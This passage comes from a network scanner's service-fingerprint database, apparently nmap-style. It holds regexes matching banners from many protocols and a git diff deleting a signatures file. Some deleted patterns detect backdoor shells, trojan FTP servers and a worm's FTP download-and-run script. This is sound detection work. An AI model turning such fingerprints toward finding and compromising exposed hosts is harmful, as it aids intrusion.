Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n diff --git a/tools/signatures b/tools/signatures deleted file mode 100644 index 89a9d62..0000000 --- a/tools/signatures +++ /dev/null @@ -1,1866 +0,0 @@ -S\xf5\xc6\x1a{ -\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) -.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 -\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n -200 NOD32SS ([\d.]+) \((\d+)\)\r\n - -\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 -\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 -\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 -MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 -Asterisk Call Manager/([\d.]+)\r\n -Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n -220 jeem\.mail\.pv ESMTP\r\n -\r\nUser Access Verification\r\n\r\nYour PassWord: -echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe -220 Bot Server \(Win32\)\r\n -PWD -=+\n= +RBackdoor ([\d.]+) -220 Windrone Server \(Win32\)\r\n -220 Reptile welcomes you\.\.\r\n -MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. -220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n -A-311 Death welcome\x001 -match backdoor m=^(?:ba|)sh-([\d.]+)\ = p/Bourne shell/ v/1/ i/**BACKDOOR**/ -match backdoor m=220-Welcome!\r\n220-\x1b\[30m/\x1b\[31m#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4# \r\n220-\x1b\[30m\| Current Time: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\| Current Date: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\\\r\n= p/Windows trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a -\x01\0\0\0 -HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n -0x[0-9a-fA-F]{32}L -\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 -\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 -\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 -BZFS\d\d\d\d\r\n\r\n -ACK\x01 -\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 -\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\*\x01..\0\x04\0\0\0\x01 -match chess m=^\n\r _ __ __ __ \n\r \| \| / /__ / /________ ____ ___ ___ / /_____ \n\r \| \| /\| / / _ \\/ / ___/ __ \\/ __ `__ \\/ _ \\ / __/ __ \\\n\r= p/Lasker Internet Chess server/ -Cirrato Client ([\w._-]+)\0 -200.*Citadel(?:/UX)? -\x7f\x7fICA\0\x7f\x7fICA\0 -.\0\0\0\x81\0\0\0\x01 -\0\0\0\x10ClsBoolVersion 1 -CFMSERV\(1\)\n -Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> -Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> -\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 -Crestron Terminal Protocol Console opened\r\n -\r\nCrestron Terminal Protocol Console Opened\r\n\r\n -\x0f\0\x01\x02 -/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n -\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n -\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n -\xaf\x01 -220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) -match directconnect m=^\MyNick ([-.\w]+)|\Lock= p/Direct Connect P2P/ i/User: 1/ o/Windows/ cpe:/o:microsoft:windows/a -match directconnect-admin m=^\r\nOpen DC Hub, version ([\d.]+), administrators port\.\r\nAll commands begin with '\' and end with '\|'\.\r\nPlease supply administrators passord\.\r\n= p/OpenDCHub directconenct hub admin port/ v/1/ o/Unix/ -0000019a[0-9a-f]{402}\r\n -220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n -\0\0\0\x0c\0\0\0\?\0\0\0\x02 -0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL -\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B -\(m\xe9l@k\xb7\xf5\x03 -\(m\xe9l@k\xb3\xf7\x1e\xa5 -\(m\xe9l@k\xb1\xf1\x15\xa5 -\?\x008 \xc3p EFTSRV1 ([\d.]+) -match eggdrop m=\(Eggdrop v([\d.]+)\+(?:STEALER\.net|Gentoo) \(C\) 1997 Robey Pointer.*Eggheads=s p/Eggdrop IRC bot console with Gentoo patches/ v/1/ i/Gentoo/ o/Linux/ cpe:/o:gentoo:linux/ -\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n -7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp -Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n -\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: -Welcome to FreeVCS MSSQL NT Service\r\n -Welcome to FreeVCS DBISAM NT Service\r\n -FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n -220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n -220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n -220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n -530 Connection refused, unknown IP address\.\r\n -220 IIS ([\w._-]+) FTP\r\n -220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n -220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n -220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n -220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n -500 OOPS: (could not bind listening IPv4 socket)\r\n -500 OOPS: vsftpd: (.*)\r\n -220[- ]FileZilla Server version (\d[-.\w ]+)\r\n -220 